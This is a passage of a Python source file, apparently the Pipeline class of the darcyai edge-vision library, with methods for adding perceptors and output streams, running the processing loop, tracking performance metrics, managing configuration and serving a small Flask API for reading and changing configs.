name_to_insert_before (str): The name of the Perceptor to insert the new Perceptor
before.
name (str): The name of the Perceptor.
perceptor (Perceptor): The Perceptor to be added.
input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor receives input data.
Defaults to `None`.
output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor produces output data.
Defaults to `None`.
multi (bool): Whether or not to run the perceptor for each item in input data.
Defaults to `False`.
accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
Defaults to `None`.
default_config (dict): The default configuration for the Perceptor.
Defaults to `None`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.add_perceptor_before(name="perceptor",
... name_to_insert_before="child_input_stream",
... perceptor=MyPerceptor(),
... input_callback=None,
... output_callback=None,
... multi=True,
... accelerator_idx=0,
... default_config={"key": "value"})
```
"""
self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
self.__validate_perceptor(
name=name,
perceptor=perceptor,
input_callback=input_callback,
output_callback=output_callback,
accelerator_idx=accelerator_idx,
default_config=default_config)
validate_not_none(
name_to_insert_before,
"name_to_insert_before is required")
validate_type(
name_to_insert_before,
str,
"name_to_insert_before must be a string")
validate(
name_to_insert_before in self.__perceptors,
f"perceptor with name '{name_to_insert_before}' does not exist")
validate(name_to_insert_before != name,
"name_to_insert_before cannot be the same as name")
perceptor_node = PerceptorNode(
name,
perceptor,
input_callback,
output_callback,
multi,
accelerator_idx)
self.__perceptors[name] = perceptor_node
parents = self.__get_perceptor_parents(name_to_insert_before)
for parent in parents:
self.__perceptors[parent].add_child_perceptor(name)
self.__perceptors[parent].remove_child_perceptor(
name_to_insert_before)
self.__perceptors[name].add_child_perceptor(name_to_insert_before)
self.__create_config_registry_for_perceptor(
name, perceptor, default_config)
def add_perceptor_after(self,
name_to_insert_after: str,
name: str,
perceptor: Perceptor,
input_callback: Callable[[StreamData,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
output_callback: Callable[[Any,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
multi: bool = False,
accelerator_idx: Union[int, None] = None,
default_config: dict = None) -> None:
"""
Adds a new Perceptor to the pipeline.
# Arguments
name_to_insert_after (str): The name of the Perceptor to insert the new Perceptor
after.
name (str): The name of the Perceptor.
perceptor (Perceptor): The Perceptor to be added.
input_callback (Callable[[StreamData, PerceptionObjectModel, Any], ConfigRegistry]): The
callback function to be called when the Perceptor receives input data.
Defaults to `None`.
output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor produces output data.
Defaults to `None`.
multi (bool): Whether or not to run the perceptor for each item in input data.
Defaults to `False`.
accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
Defaults to `None`.
default_config (dict): The default configuration for the Perceptor.
Defaults to `None`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.add_perceptor_after(name="perceptor",
... name_to_insert_after="parent_input_stream",
... perceptor=MyPerceptor(),
... input_callback=None,
... output_callback=None,
... multi=True,
... accelerator_idx=0,
... default_config={"key": "value"})
```
"""
self.add_perceptor(
name=name,
perceptor=perceptor,
input_callback=input_callback,
output_callback=output_callback,
parent=name_to_insert_after,
multi=multi,
accelerator_idx=accelerator_idx,
default_config=default_config)
def add_parallel_perceptor(self,
name_to_insert_in_parallel_with: str,
name: str,
perceptor: Perceptor,
input_callback: Callable[[StreamData,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
output_callback: Callable[[Any,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
multi: bool = False,
accelerator_idx: Union[int, None] = None,
default_config: dict = None) -> None:
"""
Adds a new Perceptor to the pipeline.
# Arguments
name_to_insert_in_parallel_with (str): The name of the Perceptor to insert the
new Perceptor in parallel with.
name (str): The name of the Perceptor.
perceptor (Perceptor): The Perceptor to be added.
input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor receives input data.
Defaults to `None`.
output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor produces output data.
Defaults to `None`.
multi (bool): Whether or not to run the perceptor for each item in input data.
Defaults to `False`.
accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
Defaults to `None`.
default_config (dict): The default configuration for the Perceptor.
Defaults to `None`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.add_parallel_perceptor(name="perceptor",
... name_to_insert_in_parallel_with="parallel_input_stream",
... perceptor=MyPerceptor(),
... input_callback=None,
... output_callback=None,
... multi=True,
... accelerator_idx=0,
... default_config={"key": "value"})
```
"""
self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
self.__validate_perceptor(
name=name,
perceptor=perceptor,
input_callback=input_callback,
output_callback=output_callback,
accelerator_idx=accelerator_idx,
default_config=default_config)
validate_not_none(
name_to_insert_in_parallel_with,
"name_to_insert_in_parallel_with is required")
validate_type(name_to_insert_in_parallel_with, str,
"name_to_insert_in_parallel_with must be a string")
validate(
name_to_insert_in_parallel_with in self.__perceptors,
f"perceptor with name '{name_to_insert_in_parallel_with}'" + \
"does not exist")
validate(name_to_insert_in_parallel_with != name,
"name_to_insert_in_parallel_with cannot be the same as name")
perceptor_node = PerceptorNode(
name,
perceptor,
input_callback,
output_callback,
multi,
accelerator_idx)
self.__perceptors[name] = perceptor_node
parents = self.__get_perceptor_parents(name_to_insert_in_parallel_with)
for parent in parents:
self.__perceptors[parent].add_child_perceptor(name)
self.__create_config_registry_for_perceptor(
name, perceptor, default_config)
def update_input_stream(self, input_stream: InputStream) -> None:
"""
Updates the input stream of the pipeline.
# Arguments
input_stream (InputStream): The input stream to be added.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.update_input_stream(camera)
"""
self.__logger.debug("Adding Input Stream of type '%s' to Pipeline",
input_stream.__class__.__name__)
validate_not_none(input_stream, "input_stream is required")
validate_type(input_stream, InputStream, "input_stream must be an InputStream")
if self.__running:
raise RuntimeError("Pipeline is already running")
self.__input_stream = input_stream
def add_output_stream(self,
name: str,
callback: Callable[[PerceptionObjectModel,
StreamData],
Any],
output_stream: OutputStream,
default_config: dict = None) -> None:
"""
Adds an OutputStream to the pipeline.
# Arguments
name (str): The name of the OutputStream.
callback (Callable[[PerceptionObjectModel, StreamData], Any]): A callback function
that is called whith PerceptionObjectModel object and returns the data that
the output stream must process.
output_stream (OutputStream): The OutputStream to be added.
default_config (dict): The default configuration for the OutputStream.
Defaults to `None`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.add_output_stream(name="output_stream",
... callback=None,
... output_stream=MyOutputStream(),
... default_config={"key": "value"})
```
"""
self.__logger.debug("Adding OutputStream '%s' to Pipeline", name)
validate_not_none(name, "name is required")
validate_type(name, str, "name must be a string")
validate(name.isidentifier(), "name must be a valid identifier")
validate(
name not in self.__output_streams,
f"output stream with name '{name}' already exists")
validate(name not in self.__perceptors, "name must be unique")
validate_not_none(callback, "callback is required")
validate(callable(callback), "callback must be a function")
validate_not_none(output_stream, "output_stream is required")
validate_type(
output_stream,
OutputStream,
"output_stream must be an instance of OutputStream")
self.__output_streams[name] = {
"callback": callback,
"stream": output_stream,
}
self.__create_config_registry_for_output_stream(
name, output_stream, default_config)
def remove_output_stream(self, name: str) -> None:
"""
Removes an OutputStream from the pipeline.
# Arguments
name (str): The name of the OutputStream to be removed.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)\
>>> pipeline.add_output_stream(name="output_stream",
... callback=None,
... output_stream=MyOutputStream(),
... default_config={"key": "value"})
>>> pipeline.remove_output_stream(name="output_stream")
```
"""
self.__logger.debug("Removing OutputStream '%s' from Pipeline", name)
validate_not_none(name, "name is required")
validate_type(name, str, "name must be a string")
if name not in self.__output_streams:
raise ValueError(
f"output stream with name '{name}' does not exist")
del self.__output_streams[name]
def stop(self) -> None:
"""
Stops the pipeline.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.stop()
```
"""
self.__logger.debug("Stopping Pipeline")
self.__running = False
self.__input_stream.stop()
for output_stream in self.__output_streams.values():
output_stream["stream"].close()
def run(self) -> None:
"""
Runs the pipeline.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.run()
```
"""
self.__logger.debug("Running Pipeline")
self.__running = True
stream = self.__input_stream.stream()
validate_type(stream, Iterable, "input stream is not Iterable")
perceptors_order = self.__get_perceptors_order()
try:
while True:
start = time.perf_counter()
try:
input_data = next(stream, sentinel.END_OF_ITERATION)
if input_data is sentinel.END_OF_ITERATION:
return
except Exception as e:
self.__logger.exception("Error running Pipeline")
if self.__input_stream_error_handler_callback is not None:
self.__input_stream_error_handler_callback(e)
else:
raise e
self.__pulse_number += 1
# Store input data history
self.__input_data_history[self.__pulse_number] = input_data
if len(self.__input_data_history) > self.__input_data_history_len:
self.__input_data_history.popitem(last=False)
pom = PerceptionObjectModel()
# Run perceptors
for perceptors in perceptors_order:
async_calls = [
self.__thread_pool.apply_async(
self.__run_perceptor,
args=(
perceptor_name,
input_data,
pom),
callback=self.__set_perceptor_result(perceptor_name, pom)) \
for perceptor_name in perceptors]
_ = [async_call.get() for async_call in async_calls]
pulse_execution_time = time.perf_counter() - start
# Calculate metrics
if self.__pulse_number == 1:
self.__average_pipeline_cycle_execution = pulse_execution_time
else:
self.__average_pipeline_cycle_execution = (
self.__average_pipeline_cycle_execution *
(self.__pulse_number - 1) +
pulse_execution_time) / self.__pulse_number
self.__metrics_history[self.__pulse_number] = {
"pulse_execution_time": pulse_execution_time,
"perceptors": self.__perceptors_execution_time,
}
if len(self.__metrics_history) > self.__metrics_history_len:
self.__metrics_history.popitem(last=False)
# Store pom
pom.set_input_data(input_data)
pom.set_pulse_number(self.__pulse_number)
self.__pom = pom
# Store pom history
self.__pom_history[self.__pulse_number] = self.__pom
if len(self.__pom_history) > self.__pom_history_len:
self.__pom_history.popitem(last=False)
if self.__perception_completion_callback is not None:
self.__perception_completion_callback(pom)
# Run output streams
if len(self.__output_streams) > 0:
async_calls = [
self.__thread_pool.apply_async(
self.__run_output_stream,
args=[
output_stream_name,
input_data,
pom]) for output_stream_name in self.__output_streams]
_ = [async_call.get() for async_call in async_calls]
self.__pom = pom
if self.__pulse_completion_callback is not None:
self.__pulse_completion_callback(pom)
finally:
self.__running = False
def get_pom(self) -> PerceptionObjectModel:
"""
Gets the Perception Object Model.
# Returns
PerceptionObjectModel: The Perception Object Model.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pom = pipeline.get_pom()
```
"""
return self.__pom
def get_current_pulse_number(self) -> int:
"""
Gets the current pulse number.
# Returns
int: The current pulse number.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pulse_number = pipeline.get_current_pulse_number()
```
"""
return self.__pulse_number
def get_latest_input(self) -> StreamData:
"""
Gets the latest input data.
# Returns
StreamData: The latest input data.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> latest_input = pipeline.get_latest_input()
```
"""
return self.__input_data_history[self.__pulse_number]
def get_historical_input(self, pulse_number: int) -> StreamData:
"""
Gets the input data from the history.
# Arguments
pulse_number (int): The pulse number.
# Returns
StreamData: The input data from the history.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> historical_input = pipeline.get_historical_input(pulse_number=1)
```
"""
if pulse_number in self.__input_data_history:
return self.__input_data_history[pulse_number]
else:
return None
def get_input_history(self) -> Dict[int, StreamData]:
"""
Gets the input data history.
# Returns
`Dict[int, StreamData]` - The input data history.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> input_history = pipeline.get_input_history()
```
"""
return self.__input_data_history.copy()
def get_historical_pom(self, pulse_number: int) -> PerceptionObjectModel:
"""
Gets the POM from the history.
# Arguments
pulse_number (int): The pulse number.
# Returns
PerceptionObjectModel: The POM from the history.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> historical_pom = pipeline.get_historical_pom(pulse_number=1)
```
"""
if pulse_number in self.__pom_history:
return self.__pom_history[pulse_number]
else:
return None
def get_pom_history(self) -> Dict[int, PerceptionObjectModel]:
"""
Gets the POM history.
# Returns
`Dict[int, PerceptionObjectModel]` - The POM history.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pom_history = pipeline.get_pom_history()
```
"""
return self.__pom_history.copy()
def run_perceptor(
self,
perceptor: Perceptor,
input_data: Any,
multi: bool = False) -> Any:
"""
Runs the Perceptor.
# Arguments
perceptor (Perceptor): The Perceptor to be run.
input_data (Any): The input data.
multi (bool): Whether or not to run the perceptor for each item in input data.
Defaults to `False`.
# Returns
Any: The result of running the Perceptor.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> result = pipeline.run_perceptor(perceptor=Perceptor(), input_data=None, multi=True)
```
"""
self.__logger.debug("Running custom Perceptor")
validate_not_none(perceptor, "perceptor is required")
validate_type(
perceptor,
Perceptor,
"perceptor must be an instance of Perceptor")
if not perceptor.is_loaded():
perceptor.load()
if multi:
return [perceptor.run(input_data_item, None)
for input_data_item in input_data]
else:
return perceptor.run(input_data, None)
def get_graph(self) -> Any:
"""
Gets the graph of the perceptors.
# Returns
Any: The graph of the perceptors.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> graph = pipeline.get_graph()
```
"""
result = {}
for perceptor in self.__perceptors:
result[perceptor] = self.__perceptors[perceptor].get_child_perceptors()
return result
def get_all_performance_metrics(self) -> Dict[str, Any]:
"""
Gets the performance metrics of the pipeline.
# Returns
`Dict[str, Any]` - The performance metrics of the pipeline.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> metrics = pipeline.get_all_performance_metrics()
```
"""
result = {
"execution_cycles": self.__pulse_number,
"average_pipeline_cycle_execution": self.__average_pipeline_cycle_execution,
}
perceptors = {}
for perceptor_name in self.__perceptors:
perceptors[perceptor_name] = self.__average_perceptor_execution[perceptor_name]
result["average_perceptor_execution"] = perceptors
result["history"] = self.__metrics_history
return result
def get_pulse_performance_metrics(
self, pulse_number: Union[int, None] = None) -> Dict[str, Any]:
"""
Gets the performance metrics of the pipeline for specific pulse.
# Arguments
pulse_number (int): The pulse number of the pulse. Defaults to current pulse.
Defaults to `None`.
# Returns
`Dict[str, Any]` - The performance metrics of the pipeline for specific pulse.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> metrics = pipeline.get_pulse_performance_metrics(pulse_number=1)
```
"""
if pulse_number is None:
pulse_number = self.__pulse_number
if pulse_number in self.__metrics_history:
return self.__metrics_history[pulse_number]
else:
return None
def get_perceptor_performance_metrics(
self, name: str, pulse_number: Union[int, None] = None) -> Dict[str, Any]:
"""
Gets the performance metrics of the pipeline for specific perceptor.
# Arguments
name (str): The name of the perceptor.
pulse_number (int): The pulse number of the pulse. Defaults to current pulse.
Defaults to `None`.
# Returns
`Dict[str, Any]` - The performance metrics of the pipeline for specific perceptor.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> metrics = pipeline.get_perceptor_performance_metrics(name="perceptor_name",
... pulse_number=1)
```
"""
if name not in self.__perceptors:
return None
if pulse_number is None:
pulse_number = self.__pulse_number
if pulse_number in self.__metrics_history:
return self.__metrics_history[pulse_number]["perceptors"][name]
else:
return None
def set_perceptor_config(
self,
perceptor_name: str,
name: str,
value: Any) -> None:
"""
Sets the config of the pipeline.
# Arguments
perceptor_name (str): The name of the perceptor.
name (str): The name of the config.
value (Any): The value of the config.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.set_perceptor_config(perceptor_name="perceptor_name",
... name="config_name",
... value=1)
```
"""
if perceptor_name in self.__perceptor_config_registry:
self.__validate_and_set_value_for_perceptor_config(
perceptor_name, name, value)
self.__perceptors[perceptor_name].set_perceptor_config(name, value)
else:
raise Exception(
f"Perceptor with name '{perceptor_name}' not found")
def get_perceptor_config(
self, perceptor_name: str) -> Dict[str, Tuple[Any, Config]]:
"""
Gets the config of the perceptor.
# Arguments
perceptor_name (str): The name of the perceptor.
# Returns
`Dict[str, Tuple[Any, Config]]` - The config of the perceptor.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> config = pipeline.get_perceptor_config(perceptor_name="perceptor_name")
```
"""
if perceptor_name not in self.__perceptor_config_registry:
raise Exception(
f"Perceptor with name '{perceptor_name}' not found")
response = {}
for config_name in self.__perceptor_config_schema[perceptor_name]:
config_schema = self.__perceptor_config_schema[perceptor_name][config_name]
response[config_name] = (
self.__perceptor_config_registry[perceptor_name].get(config_name),
config_schema)
return response
def set_output_stream_config(
self,
name: str,
config_name: str,
value: Any) -> None:
"""
Sets the config of the output stream.
# Arguments
name (str): The name of the output stream.
config_name (str): The name of the config.
value (Any): The value of the config.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.set_output_stream_config(name="output_stream_name",
... config_name="config_name",
... value=1)
```
"""
if name in self.__output_config_registry:
self.__validate_and_set_value_for_output_stream_config(
name, config_name, value)
self.__output_streams[name].set_perceptor_config(
config_name, value)
else:
raise Exception(f"OutputStream with name '{name}' not found")
def get_output_stream_config(
self, name: str) -> Dict[str, Tuple[Any, Config]]:
"""
Gets the config of the output stream.
# Arguments
name (str): The name of the output stream.
# Returns
`Dict[str, Tuple[Any, Config]]` - The config of the output stream.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> config = pipeline.get_output_stream_config(name="output_stream_name")
```
"""
if name not in self.__output_config_registry:
raise Exception(f"OutputStream with name '{name}' not found")
response = {}
for config_name in self.__output_config_schema[name]:
config_schema = self.__output_config_schema[name][config_name]
response[config_name] = (
self.__output_config_registry[name].get(config_name),
config_schema)
return response
def __run_output_stream(
self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:
"""
Runs the output stream.
# Arguments
name (str): The name of the output stream.
input_data (StreamData): The input data.
pom (PerceptionObjectModel): The pom.
"""
try:
processed_data = self.__output_streams[name]["callback"](
pom, input_data)
output = self.__output_streams[name]["stream"].write(processed_data)
pom.set_value(name, output)
except Exception as e:
self.__logger.exception("Error running output stream '%s'", name)
if self.__output_stream_error_handler_callback is not None:
self.__output_stream_error_handler_callback(name, e)
else:
raise e
def __run_perceptor(
self, name: str, input_data: StreamData, pom: PerceptionObjectModel) -> None:
"""
Runs the perceptor.
# Arguments
name (str): The name of the perceptor.
input_data (StreamData): The input data.
pom (PerceptionObjectModel): The pom.
"""
start = time.perf_counter()
try:
return self.__processing_engine.run(
self.__perceptors[name],
input_data,
pom,
self.__perceptor_config_registry[name])
except Exception as e:
self.__logger.exception("Error running perceptor '%s'", name)
if self.__perceptor_error_handler_callback is not None:
self.__perceptor_error_handler_callback(name, e)
else:
raise e
finally:
execution_time = time.perf_counter() - start
self.__perceptors_execution_time[name] = {
"execution_time": execution_time,
}
if name in self.__average_perceptor_execution:
avg_perceptors_execution = self.__average_perceptor_execution[name]
self.__average_perceptor_execution[name] = (
avg_perceptors_execution *
(self.__pulse_number - 1) +
execution_time) / self.__pulse_number
else:
self.__average_perceptor_execution[name] = execution_time
def __set_perceptor_result(
self, perceptor_name: str, pom: PerceptionObjectModel) -> Callable[[Any], None]:
"""
Sets the result of the perceptor.
# Arguments
perceptor_name (str): The name of the perceptor.
pom (PerceptionObjectModel): The pom.
# Returns
Callable[[Any], None]: The callback function.
"""
def set_result(result: Any) -> None:
"""
Sets the result of the perceptor.
# Arguments
result (Any): The result of the perceptor.
"""
pom.set_value(perceptor_name, result)
return set_result
def __get_perceptors_order(self) -> List[str]:
"""
Gets the topological order of the perceptors.
# Returns
[str]: The order of the perceptors.
"""
orphan_perceptors = []
parent_perceptors = []
visited = []
for perceptor_name in self.__perceptors:
child_perceptors = self.__perceptors[perceptor_name].get_child_perceptors(
)
if len(child_perceptors) == 0:
if perceptor_name not in visited:
orphan_perceptors.append(perceptor_name)
else:
visited.append(perceptor_name)
for child in child_perceptors:
parent_perceptors.append((perceptor_name, child))
visited.append(child)
if len(parent_perceptors) > 0:
perceptors_order = acyclic_toposort(parent_perceptors)
_ = [perceptors_order[0].add(x) for x in orphan_perceptors]
else:
perceptors_order = [orphan_perceptors]
return perceptors_order
def __validate_perceptor(self,
name: str,
perceptor: Perceptor,
input_callback:
Callable[[StreamData, PerceptionObjectModel], Any] = None,
output_callback: Callable[[Any, PerceptionObjectModel], Any] = None,
accelerator_idx: Union[int, None] = None,
default_config: dict = None) -> None:
"""
Validates the perceptor.
# Arguments
name (str): The name of the perceptor.
perceptor (Perceptor): The perceptor.
input_callback (Callable[[StreamData, PerceptionObjectModel], Any]): The
callback function for the input stream. Default is `None`.
output_callback (Callable[[Any, PerceptionObjectModel], Any]): The
callback function for the output stream. Default is `None`.
accelerator_idx (int): The index of the accelerator. Defaults to `None`.
default_config (dict): The default config. Defaults to `None`.
"""
if self.__running:
raise Exception("Pipeline is already running")
validate_not_none(name, "name is required")
validate_type(name, str, "name must be a string")
validate(name.isidentifier(), "name must be a valid identifier")
validate(name not in self.__perceptors, "name must be unique")
validate(name not in self.__output_streams, "name must be unique")
validate_not_none(perceptor, "perceptor is required")
validate_type(
perceptor,
Perceptor,
"perceptor must be an instance of Perceptor")
if input_callback is not None:
validate_not_none(input_callback, "input_callback is required")
validate(callable(input_callback), "input_callback must be a function")
if output_callback is not None:
validate(
callable(output_callback),
"output_callback must be a function")
if accelerator_idx is not None:
validate_type(
accelerator_idx,
int,
"accelerator_idx must be an integer")
if accelerator_idx >= self.__num_of_edge_tpus:
raise ValueError(
f"accelerator_idx must be >= 0 and < {self.__num_of_edge_tpus}")
if default_config is not None:
validate_type(
default_config,
dict,
"default_config must be a dictionary")
def __get_perceptor_parents(self, perceptor_name: str) -> List[str]:
"""
Gets the parents of the perceptor.
# Arguments
perceptor_name (str): The name of the perceptor.
# Returns
[str]: The parents of the perceptor.
"""
parent_perceptors = []
for parent_perceptor_name in self.__perceptors:
child_perceptors = self.__perceptors[parent_perceptor_name].get_child_perceptors(
)
if perceptor_name in child_perceptors:
parent_perceptors.append(parent_perceptor_name)
return parent_perceptors
def __create_config_registry_for_perceptor(
self,
perceptor_name: str,
perceptor: Perceptor,
default_config: dict = None) -> None:
"""
Creates the config registry for the perceptor.
# Arguments
perceptor_name (str): The name of the perceptor.
perceptor (Perceptor): The perceptor.
default_config (dict): The default config. Defaults to `None`.
"""
self.__perceptor_config_registry[perceptor_name] = ConfigRegistry()
perceptor_config_schema = perceptor.get_config_schema()
config_schema_dict = {}
for config_schema in perceptor_config_schema:
validate_type(
config_schema,
Config,
"config_schema must be an instance of Config")
config_schema_dict[config_schema.name] = config_schema
self.__perceptor_config_registry[perceptor_name].set_value(
config_schema.name, config_schema.default_value)
self.__perceptor_config_schema[perceptor_name] = config_schema_dict
if default_config is not None:
for name, value in default_config.items():
self.__validate_and_set_value_for_perceptor_config(
perceptor_name, name, value)
def __validate_and_set_value_for_perceptor_config(
self, perceptor_name: str, config_name: str, value: Any) -> None:
"""
Validates and sets the value for the perceptor config.
# Arguments
perceptor_name (str): The name of the perceptor.
config_name (str): The name of the config.
value (Any): The value of the config.
"""
config_schema_dict = self.__perceptor_config_schema[perceptor_name]
if config_name not in config_schema_dict:
return
config_schema = config_schema_dict[config_name]
if not config_schema.is_valid(value):
raise ValueError(f"Invalid value for config '{config_name}'")
self.__perceptor_config_registry[perceptor_name].set_value(
config_name, value)
self.__perceptors[perceptor_name].set_perceptor_config(
config_name, value)
def __start_api_server(self) -> None:
"""
Starts the API server.
"""
script_dir = pathlib.Path(__file__).parent.absolute()
swagger_path = os.path.join(script_dir, "swagger")
if self.__flask_app is None:
self.__flask_app = Flask(__name__,
static_folder=os.path.join(swagger_path, "static"),
template_folder=os.path.join(swagger_path, "templates"))
ssl_context = None
self.__setup_paths()
self.__flask_app.run(
host=self.__host,
port=self.__port,
ssl_context=ssl_context,
debug=False)
else:
self.__setup_paths()
def __setup_paths(self) -> None:
"""
Sets up the paths.
"""
paths = {
"/perceptors": {
"methods": ["GET"],
"function": self.__get_perceptors,
},
"/outputs": {
"methods": ["GET"],
"function": self.__get_outputs,
},
"/perceptors/config": {
"methods": ["GET", "PATCH"],
"function": self.__modify_perceptors_config_registry,
},
"/perceptors/<perceptor>/config": {
"methods": ["GET", "PATCH"],
"function": self.__modify_perceptor_config_registry,
},
"/outputs/config": {
"methods": ["GET", "PATCH"],
"function": self.__modify_outputs_config_registry,
},
"/outputs/<output_stream>/config": {
"methods": ["GET", "PATCH"],
"function": self.__modify_output_config_registry,
},
"/swagger": {
"methods": ["GET"],
"function": self.__swagger,
},
"/specs": {
"methods": ["GET"],
"function": self.__specs,
},
}
for path, path_config in paths.items():
complete_path = self.__path + path
add = True
for rule in self.__flask_app.url_map.iter_rules():
if rule.rule == complete_path:
add = False
break
if not add:
continue
self.__flask_app.add_url_rule(
complete_path,
complete_path,
path_config["function"],
methods=path_config["methods"])
def __get_perceptors(self) -> Response:
"""
Gets the perceptors.
# Returns
Response: The response.
"""
perceptors = self.__perceptors.keys()
return jsonify(list(perceptors))
def __get_outputs(self) -> Response:
"""
Gets the outputs.
# Returns
Response: The response.
"""
output_streams = self.__output_streams.keys()
return jsonify(list(output_streams))
def __modify_perceptors_config_registry(self) -> Response:
"""
Modifies the perceptors config registry.
# Returns
Response: The response.
"""
errors = []
if request.method == "PATCH":
body = self.__get_body()
for perceptor_name, values in body.items():
if perceptor_name not in self.__perceptors:
return Response(
f"perceptor with name {perceptor_name} does not exist",
status=404)
for name, value in values.items():
try:
self.__validate_and_set_value_for_perceptor_config(
perceptor_name, name, value)
except BaseException:
errors.append(f"Invalid value for config '{name}'")
pass
if len(errors) > 0:
return jsonify(errors), 400
cfgs = {}
for perceptor_name in self.__perceptors:
cfgs[perceptor_name] = []
for config_name in self.__perceptor_config_schema[perceptor_name]:
config_schema = self.__perceptor_config_schema[perceptor_name][config_name]
cfgs[perceptor_name].append({
"name": config_name,
"value": self.__perceptor_config_registry[perceptor_name].get(config_name),
"type": config_schema.type,
"description": config_schema.description,
"default_value": config_schema.default_value,
})
return jsonify(cfgs)
def __modify_perceptor_config_registry(self, **kwargs) -> Response:
"""
Modifies the perceptor config registry.
# Arguments
**kwargs: The keyword arguments.
# Returns
Response: The response.
"""
perceptor_name = kwargs["perceptor"]
if perceptor_name not in self.__perceptors:
return Response(
f"perceptor with name {perceptor_name} does not exist", status=404)
errors = []
if request.method == "PATCH":
